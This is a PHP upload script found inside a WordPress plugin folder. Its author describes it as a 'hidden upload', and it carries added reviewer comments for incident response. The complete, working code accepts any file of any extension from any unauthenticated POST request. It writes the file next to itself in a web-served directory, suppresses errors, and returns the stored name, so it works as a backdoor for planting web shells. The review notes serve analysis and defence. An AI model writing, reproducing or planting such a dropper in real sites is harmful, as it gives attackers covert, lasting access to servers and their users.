/home/devfahim/www/fluentlab.devfahim.site/wp-content/plugins/zeddplugins/m/up2.php
<?php
// Standalone upload handler: accepts a POSTed file in the "ufile" field and
// writes it into this script's own directory (__DIR__) under a generated name.
//
// Original author's description (translated):
//   Lightweight & hidden upload, without an "uploads/" folder.
//   Saves in the same folder as this file, uses a randomized name, stream fallback.
//
// NOTE(review): nothing in this file authenticates the request. There is no
// session, nonce, token or capability check, and WordPress is not loaded.
// The only gate is the request method plus the presence of the file field.
// NOTE(review): for incident response, files written by this script are named
// "<unix timestamp>_<8 hex chars>[.<ext>]" and sit next to this script.
// Web-server logs would show POST requests to this script's URL.
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['ufile'])) {
$f = $_FILES['ufile'];
// Reject the request if PHP reported an upload error for this field.
if ($f['error'] !== UPLOAD_ERR_OK) {
http_response_code(400);
die("❌ Upload error: {$f['error']}");
}
$src = $f['tmp_name'];
// Sanitize the original name (strip path, extra spaces, suspicious characters).
// Every character outside [A-Za-z0-9._-] becomes "_".
// NOTE(review): the cleaned name is used only to derive the extension below.
// There is no extension allowlist, no content-type check and no size limit here,
// so whatever extension the client supplied is kept on the stored file.
$origName = basename($f['name']);
$origName = preg_replace('/[^A-Za-z0-9\.\-\_]/', '_', $origName);
// Build a random file name (timestamp prefix + 8 hex) + original extension if present.
$ext = pathinfo($origName, PATHINFO_EXTENSION);
$prefix = time() . '_' . bin2hex(random_bytes(4));
$destName = $prefix . ($ext ? '.' . $ext : '');
$destPath = __DIR__ . DIRECTORY_SEPARATOR . $destName;
$ok = false;
$method = null;
// 1) Safest & fastest method: move_uploaded_file.
// The "@" operators here and below suppress PHP warnings, so a failed attempt
// leaves no error message from these calls.
if (is_uploaded_file($src) && @move_uploaded_file($src, $destPath)) {
$ok = true; $method = 'move_uploaded_file';
}
// 2) Streaming fallback: open both and copy per chunk (does not load the whole file into memory).
// NOTE(review): this branch is reached when is_uploaded_file() fails or the move
// fails, so it runs without a passing is_uploaded_file() check on $src.
elseif (($in = @fopen($src, 'rb')) !== false && ($out = @fopen($destPath, 'wb')) !== false) {
while (!feof($in)) {
$chunk = fread($in, 8192);
if ($chunk === false) break;
$written = fwrite($out, $chunk);
if ($written === false) break;
}
if (is_resource($in)) fclose($in);
if (is_resource($out)) fclose($out);
// Success only means "destination exists and is non-empty". A copy that stopped
// early on a read/write failure still counts as success if any bytes were written.
$ok = file_exists($destPath) && filesize($destPath) > 0;
$method = 'stream_copy_chunk';
// Remove the temporary source file regardless of whether the copy succeeded.
@unlink($src);
}
// 3) rename (sometimes works on some tmp->target configurations).
// Like branch 2, this runs without a passing is_uploaded_file() check.
elseif (@rename($src, $destPath)) {
$ok = true; $method = 'rename';
}
// --- do not use shell_exec / exec --- many hosts block those functions
// If successful, set a safe permission and do not expose a direct link.
if ($ok) {
// Original comment (translated): readable by the web server, but not executable.
// NOTE(review): 0644 only clears the execute bits. Whether the web server hands
// the file to a script handler depends on server configuration, not on this mode.
@chmod($destPath, 0644);
$sizeKB = number_format(filesize($destPath) / 1024, 2);
// Minimal response (does not display the original path).
// If desired, create a separate endpoint for download with a token.
echo "✅ Upload sukses — metode: {$method}\n";
// The generated server-side file name is returned to the client here.
echo "📦 Nama file server-side: {$destName}\n";
echo "💾 Ukuran: {$sizeKB} KB\n";
// Do not echo a direct path such as /file.php?name=... unless a token is used.
} else {
http_response_code(500);
echo "❌ Semua metode upload gagal.";
}
exit;
}
?>
<!-- Form Upload -->
<form method="POST" enctype="multipart/form-data">
<input type="file" name="ufile" required>
<button type="submit">Upload</button>
</form>